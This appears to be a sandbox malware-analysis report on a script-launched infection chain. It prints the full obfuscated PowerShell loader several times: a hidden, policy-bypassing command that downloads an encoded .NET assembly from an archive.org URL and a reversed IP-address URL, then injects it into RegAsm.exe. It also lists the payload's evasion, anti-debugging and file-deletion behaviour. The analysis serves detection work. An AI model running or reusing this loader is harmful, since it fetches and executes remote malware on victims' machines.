                  Data Obfuscation

                  Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJyk", "0", "false");
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD$global:?
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHNIRUxsSWRbMV0rJHNoRWxsSURbMTNdKydYJykgKCgnRklpJysndXJsID0gOXVPaHR0cHMnKyc6LycrJy9pYTYwMCcrJzEwMC51cy5hcmNoJysnaScrJ3ZlLm9yZy8yNC8nKydpdGVtcy9kZScrJ3RhaC1ub3RlLScrJ3YvRGV0YScrJ2hOJysnb3QnKydlVi50eHQ5dU87JysnRkknKydpJysnYmFzZScrJzY0QycrJ29uJysndCcrJ2VuJysndCcrJyAnKyc9IChOZXctT2JqZWN0IFN5c3RlbS5OJysnZScrJ3QnKycuV2ViJysnQycrJ2xpJysnZW50KS5EJysnb3cnKydubCcrJ29hZCcrJ1N0cmluZyhGJysnSScrJ2knKyd1cicrJ2wpJysnO0ZJaWInKydpbmFyeUNvbicrJ3RlJysnbnQnKycgJysnPSBbU3lzdGVtJysnLicrJ0NvbnZlcnRdOjpGcm9tQmEnKydzZTY0JysnU3QnKydyaW4nKydnJysnKEYnKydJaWJhcycrJ2UnKyc2NENvbnRlJysnbnQpO0ZJaWFzJysnc2VtJysnYmx5ID0gJysnW1JlZmxlJysnY3QnKydpb24uQXNzZW1ibHldOjpMbycrJ2FkKEZJaWJpbicrJ2FyJysneUMnKydvbnRlbnQpO0ZJaXR5JysncGUgPSBGSWlhc3MnKydlbScrJ2JseS5HZXQnKydUeXBlKDl1T1J1blAnKydFLkhvbWU5dScrJ08pO0ZJaW1ldGhvZCAnKyc9IEYnKydJJysnaXR5cGUnKycuR2V0TWV0JysnaG9kJysnKDl1T1ZBJysnSTl1Tyk7RicrJ0lpbWUnKyd0JysnaG8nKydkJysnLicrJ0ludm9rZScrJyhGSWknKyduJysndWwnKydsLCBbJysnb2JqZWMnKyd0W11dQCg5dU90eHQuRicrJ0MnKydDTVIvJysnNzExMi8zMjEuOTguMDkuJysnNTQvLzonKydwJysndCcrJ3RoOScrJ3VPICwgOXUnKydPZGVzYXRpdmFkbzknKyd1JysnTycrJyAsIDl1T2RlJysncycrJ2EnKyd0aScrJ3ZhZCcrJ285dU8gLCA5dU9kZXNhdGl2JysnYWRvOXVPLDl1T1JlZycrJ0FzbTl1Tyw5dU85JysndU8nKycpKScpLnJFUGxBQ2UoKFtjaEFSXTcwK1tjaEFSXTczK1tjaEFSXTEwNSksW3NUcmluZ11bY2hBUl0zNikuckVQbEFDZSgoW2NoQVJdNTcrW2NoQVJdMTE3K1tjaEFSXTc5KSxbc1RyaW5nXVtjaEFSXTM5KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 11_2_0041CBE1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF7C0C905B9 push edi; retf | 8_2_00007FF7C0C905BA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF7C0C900BD pushad ; iretd | 8_2_00007FF7C0C900C1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF7C0C9101D pushad ; retf | 8_2_00007FF7C0C91022
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF7C0C9E37E pushad ; iretd | 10_2_00007FF7C0C9E399
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF7C0C91425 pushad ; retf | 10_2_00007FF7C0C9142A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF7C0C97563 push ebx; iretd | 10_2_00007FF7C0C9756A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF7C0C900BD pushad ; iretd | 10_2_00007FF7C0C900C1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00457186 push ecx; ret | 11_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0045E55D push esi; ret | 11_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00457AA8 push eax; ret | 11_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434EB6 push ecx; ret | 11_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00406EEB ShellExecuteW,URLDownloadToFileW | 11_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 11_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 11_2_0041CBE1
                  Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040F7E2 Sleep,ExitProcess | 11_2_0040F7E2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FF7C0C9A1F9 sldt word ptr fs:[eax] | 10_2_00007FF7C0C9A1F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 11_2_0041A7D9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1638
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1537
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4173
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5542
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: threadDelayed 9339
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Window / User API: foregroundWindowGot 1772
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6260 | Thread sleep count: 4173 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088 | Thread sleep count: 5542 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5900 | Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6176 | Thread sleep count: 258 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6176 | Thread sleep time: -129000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524 | Thread sleep count: 143 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524 | Thread sleep time: -429000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524 | Thread sleep count: 9339 > 30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2524 | Thread sleep time: -28017000s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose | 11_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose | 11_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose | 11_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose | 11_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose | 11_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407877 FindFirstFileW,FindNextFileW | 11_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044E8F9 FindFirstFileExA | 11_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 11_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW | 11_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 11_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 11_2_00407CD2
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: powershell.exe, 0000000A.00000002.1435352325.0000026F45BC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: RegAsm.exe, 0000000B.00000002.2572660143.000000000114B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | API call chain: ExitProcess graph end node | graph_11-48800
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 11_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 11_2_0041CBE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00443355 mov eax, dword ptr fs:[00000030h] | 11_2_00443355
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_004120B2 GetProcessHeap,HeapFree | 11_2_004120B2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 11_2_0043503C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 11_2_00434A8A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 11_2_0043BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00434BD8 SetUnhandledExceptionFilter | 11_2_00434BD8

                  HIPS / PFW / Operating System Protection Evasion

                  Source: Yara match | File source: amsi64_7484.amsi.csv, type: OTHER
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CD2008
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 11_2_00412132
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00419662 mouse_event,11_2_00419662
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $sHELlId[1]+$shEllID[13]+'X') (('FIi'+'url = 9uOhttps'+':/'+'/ia600'+'100.us.arch'+'i'+'ve.org/24/'+'items/de'+'tah-note-'+'v/Deta'+'hN'+'ot'+'eV.txt9uO;'+'FI'+'i'+'base'+'64C'+'on'+'t'+'en'+'t'+' '+'= (New-Object System.N'+'e'+'t'+'.Web'+'C'+'li'+'ent).D'+'ow'+'nl'+'oad'+'String(F'+'I'+'i'+'ur'+'l)'+';FIib'+'inaryCon'+'te'+'nt'+' '+'= [System'+'.'+'Convert]::FromBa'+'se64'+'St'+'rin'+'g'+'(F'+'Iibas'+'e'+'64Conte'+'nt);FIias'+'sem'+'bly = '+'[Refle'+'ct'+'ion.Assembly]::Lo'+'ad(FIibin'+'ar'+'yC'+'ontent);FIity'+'pe = FIiass'+'em'+'bly.Get'+'Type(9uORunP'+'E.Home9u'+'O);FIimethod '+'= F'+'I'+'itype'+'.GetMet'+'hod'+'(9uOVA'+'I9uO);F'+'Iime'+'t'+'ho'+'d'+'.'+'Invoke'+'(FIi'+'n'+'ul'+'l, ['+'objec'+'t[]]@(9uOtxt.F'+'C'+'CMR/'+'7112/321.98.09.'+'54//:'+'p'+'t'+'th9'+'uO , 9u'+'Odesativado9'+'u'+'O'+' , 9uOde'+'s'+'a'+'ti'+'vad'+'o9uO , 9uOdesativ'+'ado9uO,9uOReg'+'Asm9uO,9uO9'+'uO'+'))').rEPlACe(([chAR]70+[chAR]73+[chAR]105),[sTring][chAR]36).rEPlACe(([chAR]57+[chAR]117+[chAR]79),[sTring][chAR]39))"Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
